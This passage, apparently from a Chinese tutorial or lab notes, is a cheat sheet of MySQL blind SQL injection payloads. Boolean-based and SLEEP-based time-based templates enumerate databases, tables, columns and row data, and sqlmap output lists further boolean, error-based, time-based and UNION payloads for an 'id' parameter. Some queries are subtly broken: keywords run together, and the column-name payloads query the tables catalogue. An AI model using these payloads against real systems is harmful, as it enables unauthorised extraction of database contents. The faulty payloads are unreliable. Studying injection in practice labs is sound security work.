#判断指定库中表的个数 #n为猜测的数据表个数,base_h为指定库的hex编码 ... AND ((SELECTCOUNT(DISTINCT+table_name)FROM information_schema.tables WHERE table_schema= base_h)>n);
#判断表名长度 #x为数据表偏移量,l为猜测表名长度,base_h为指定库的hex编码 ... AND (LENGTH((SELECTDISTINCT table_name FROM information_schema.tables WHERE table_schema=base_h LIMIT x,1))>l);
#判断表名字符 #x为数据表偏移量,y为名称字符串偏移量,c为猜测的ASCII码值,base_h为指定库的hex编码 ... AND (SELECT ASCII(SUBSTR((SELECTDISTINCT table_name FROM information_schema.tables WHERE table_schema=base_h LIMIT x,1),y,1))>c);
判断列。
1 2 3 4 5 6 7 8 9 10 11
#判断指定表中列的个数 #n为猜测的列的个数,base_h为指定库的hex编码,table_h为指定表的hex编码 ... AND ((SELECTCOUNT(DISTINCT+column_name)FROM information_schema.columns WHERE table_name=table_h AND table_schema= base_h)>n);
#判断列名长度 #x为列偏移量,l为猜测列名长度,base_h为指定库的hex编码,table_h为指定表的hex编码 ... AND (LENGTH((SELECTDISTINCT column_name FROM information_schema.columns WHERE table_name=table_h AND table_schema=base_h LIMIT x,1))>l);
#判断列名字符 #x为列偏移量,y为名称字符串偏移量,c为猜测的ASCII码值,base_h为指定库的hex编码,table_h为指定表的hex编码 ... AND (SELECT ASCII(SUBSTR((SELECTDISTINCT table_name FROM information_schema.tables WHERE table_name=table_h AND table_schema=base_h LIMIT x,1),y,1))>c);
判断数据。
1 2 3 4 5 6 7 8 9 10 11
#判断数据表中数据个数 #n为猜测的数据个数,base_n为数据库名,table_n为数据表名 ... AND ((SELECTCOUNT(*) FROM base_n.table_n)>n);
#判断字段长度 #x为字段偏移量,l为猜测字段长度,base_n为数据库名,table_n为数据表名,column_n为列名 ... AND (LENGTH((SELECT column_n FROM base_n.table_n LIMIT x,1))>l);
#判断字段字符 #x为字段偏移量,y为名称字符串偏移量,c为猜测的ASCII码值,base_n为数据库名,table_n为数据表名,column_n为列名 ... AND (SELECT ASCII(SUBSTR((SELECT column_n FROM base_n.table_n LIMIT x,1),y,1))>c);
IF ( CONDITION, TRUE, FALSE) 如果条件语句CONDITION为真,执行TRUE语句;反之,执行FALSE语句。
步骤
寻找注入点,判断注入类型。
判断数据库。
1 2 3 4 5 6 7 8 9 10 11
#判断数据库个数 #n为猜测的数据库个数 ... AND IF((SELECTCOUNT(DISTINCT+table_schema)FROM information_schema.tables)>n,SLEEP(5),1);
#当前数据库名称 #c为猜测的ASCII码值,y为名称字符串偏移量 ... AND IF((SELECT ASCII(substr((SELECT database()),y,1))>c),SLEEP(5),1);
#所有数据库名称 #x为数据库偏移量,c为猜测的ASCII码值,y为库名偏移量 ... AND IF((SELECT ASCII(SUBSTR((SELECTDISTINCT table_schema FROM information_schema.tables LIMIT x,1),y,1))>c),SLEEP(5),1);
判断数据表。
1 2 3 4 5 6 7 8 9 10 11
#判断指定库中表的个数 #n为猜测的数据表个数,base_h为指定库的hex编码 ... AND IF(((SELECTCOUNT(DISTINCT+table_name)FROM information_schema.tables WHERE table_schema= base_h)>n),SLEEP(5),1);
#判断表名长度 #x为数据表偏移量,l为猜测表名长度,base_h为指定库的hex编码 ... AND IF((LENGTH((SELECTDISTINCT table_name FROM information_schema.tables WHERE table_schema=base_h LIMIT x,1))>l),SLEEP(5),1);
#判断表名字符 #x为数据表偏移量,y为名称字符串偏移量,c为猜测的ASCII码值,base_h为指定库的hex编码 ... AND IF((SELECT ASCII(SUBSTR((SELECTDISTINCT table_name FROM information_schema.tables WHERE table_schema=base_h LIMIT x,1),y,1))>c),SLEEP(5),1);
判断列。
1 2 3 4 5 6 7 8 9 10 11
#判断指定表中列的个数 #n为猜测的列的个数,base_h为指定库的hex编码,table_h为指定表的hex编码 ... AND IF(((SELECTCOUNT(DISTINCT+column_name)FROM information_schema.columns WHERE table_name=table_h AND table_schema= base_h)>n),SLEEP(5),1);
#判断列名长度 #x为列偏移量,l为猜测列名长度,base_h为指定库的hex编码,table_h为指定表的hex编码 ... AND IF((LENGTH((SELECTDISTINCT column_name FROM information_schema.columns WHERE table_name=table_h AND table_schema=base_h LIMIT x,1))>l),SLEEP(5),1);
#判断列名字符 #x为列偏移量,y为名称字符串偏移量,c为猜测的ASCII码值,base_h为指定库的hex编码,table_h为指定表的hex编码 ... AND IF((SELECT ASCII(SUBSTR((SELECTDISTINCT table_name FROM information_schema.tables WHERE table_name=table_h AND table_schema=base_h LIMIT x,1),y,1))>c),SLEEP(5),1);
判断数据。
1 2 3 4 5 6 7 8 9 10 11
#判断数据表中数据个数 #n为猜测的数据个数,base_n为数据库名,table_n为数据表名 ... AND IF(((SELECTCOUNT(*) FROM base_n.table_n)>n),SLEEP(5),1);
#判断字段长度 #x为字段偏移量,l为猜测字段长度,base_n为数据库名,table_n为数据表名,column_n为列名 ... AND IF((LENGTH((SELECT column_n FROM base_n.table_n LIMIT x,1))>l),SLEEP(5),1);
#判断字段字符 #x为字段偏移量,y为名称字符串偏移量,c为猜测的ASCII码值,base_n为数据库名,table_n为数据表名,column_n为列名 ... AND IF((SELECT ASCII(SUBSTR((SELECT column_n FROM base_n.table_n LIMIT x,1),y,1))>c),SLEEP(5),1);
#输出 sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) #布尔盲注 Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: id=1' OR NOT 4938=4938#&Submit=Submit #报错注入 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: id=1' AND GTID_SUBSET(CONCAT(0x71626b7671,(SELECT (ELT(2858=2858,1))),0x71627a7071),2858)-- qDrZ&Submit=Submit
#时间盲注 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 9237 FROM (SELECT(SLEEP(5)))RCwq)-- pggr&Submit=Submit #联合注入 Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626b7671,0x6b786657706745717a444d55656a69786e70704f4143586874496741624c4444454350617159755a,0x71627a7071)#&Submit=Submit ---